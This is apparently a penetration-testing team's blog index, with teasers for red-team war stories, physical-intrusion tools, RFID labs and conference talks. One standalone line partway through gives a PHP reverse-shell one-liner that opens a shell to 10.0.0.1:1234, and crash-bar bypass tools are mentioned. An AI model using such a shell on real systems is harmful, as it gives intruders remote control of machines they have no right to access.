Quick Talk – Hacker Memory Lane
Join Tim and Brent as they discuss stories of their early exploits with old-school hacking, phone phreaking, 90’s hacker culture, as well as what motivated them to pursue careers in Information Security.
When traveling for these types of assessments, we always consider the location of a client’s facilities. Often, we’re fortunate enough that these locations are adjacent to a hotel, café, food court, or a shared facility in general. How does this help, other than the convenience of a nap or food in between efforts? A malicious actor can use this to conduct passive reconnaissance and gather useful information, anything from the target facility’s dress code, ingress/egress points, security camera placement, style of… More War Story: “Can I see that?”
Assessment Type: Red Team (Onsite)
Target Type: Corporate Healthcare Institute
Assessment Background
With a loose-fitting patterned tie, white button-up shirt, some gray slacks, and a fake badge draped around my neck (that I had made up and printed at the hotel earlier that morning during breakfast), I was dropped off at the target facility by a fellow consultant. … More War Story: Piggyback BBQ
We have several war stories like this and often share them as case studies during the presentations and training that Brent and I conduct. I am kicking off a series of regular War Stories that will be shared here! By sharing these stories, I hope to provide some legitimate examples of how we have been … More War Story: Keyloggers and Coffee
When teaching how to attack access control systems such as proximity card readers, it’s much easier to have a solution that allows me to demonstrate, as well as provides students the ability to practice these attacks in the classroom. Access control systems vary from location to location, and getting approval from the facility’s owner to attack … More Portable RFID Access Control Lab
Are the employees at your target location paying attention?
Only the most daring physical pentesters are comfortable wearing such a bold shirt to really put a company’s incident response and security awareness training to the test. … More Physical Intrusion T-Shirt
Just for fun, I decided to make a few crash bar (J tool) bypass tools to hand out at DEF CON 26. They are made with weldable wire, and some heat shrink for the grip, and to help prevent scratching. Also, for the sake of size, I decided to create a very small hook that … More Crash Bar Bypass Tools for DEF CON 26
While working on a two-week-long engagement with a client, we had built enough rapport to joke openly, and be ourselves (which is a scary thought). Through this, I had started teasing him about his department’s “security awareness” posters. These things were so cheesy. So, at the end of the two weeks, as we were … More Vintage Security Awareness Posters
Make an Incomplete Nmap Scan .xml File Usable for Rawr and Other Applications That Accept .csv File-types
This is a very non-technical how-to for newcomers who have found themselves in a situation where for some reason or another, their Nmap scan wasn’t able to complete. This can be a problem when you were planning on feeding … More Make an Incomplete Nmap .xml File Usable Again
My #Hack5 LAN Turtle is ready for deployment! This has certainly been a helpful tool to use for #SocialEngineering assessments. –Brent
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
Brent here. DerbyCon 5 – 2015 was awesome! I presented my talk “Hacking Web Apps” and really enjoyed the amount of questions that people asked during the Q&A portion at the end. Thanks to Dave Kennedy and TrustedSec for the opportunity to present. If you’re interested in watching my talk, here is the link: https://www.youtube.com/watch?v=J1tHFEc09u0 … More DerbyCon 5.0 – “Hacking Web Apps”
Brent here. If you’re going to be at DEF CON 23, I’m speaking on Thursday at 11am on hacking web apps. Come on by if you’re able and check it out! I’ll be available for questions afterwards. UPDATE: That was a blast! I’m glad that there was such a great turnout as well as so … More DEF CON 23 – Hacking Web Apps
How to override your hotel’s thermostat and disable the motion sensor to it as well: http://viewfromthewing.boardingarea.com/2013/11/10/override-hotels-thermostat-controls-make-cool-hot-youd-like/
CircleCityCon in Indianapolis! DrBearSec knows how to put on a great hacker conference. Thanks for having Tim and me out to speak. Our talk was titled “From Parking Lot to Pwnage – Hack-free Network Pwnage”. We did a bit of a different format with this talk. You’ll notice we’re sitting in chairs. The more informal, conversational … More CircleCityCon – 2015
THANK YOU to B-Sides Nashville for having us come out and speak. This con was fun, the talk went great and the participation and questions from those who listened were refreshing. The title of our talk was “From Parking Lot to Server Room” and was scheduled from 10:30-11:30am on the “Red” track. Check out http://bsidesnash.org/ … More B-Sides Nashville – 2015
PhreakNIC was another cool setting, smaller hacker con. It was nice to be able to have open conversations during my talk. Another great part of this was being on the Hacker 101 panel that evening. I’m glad that section wasn’t recorded. There were some very “interesting” topics and it certainly felt like an old-school hacker meetup … More PhreakNIC 2015 – Nashville, TN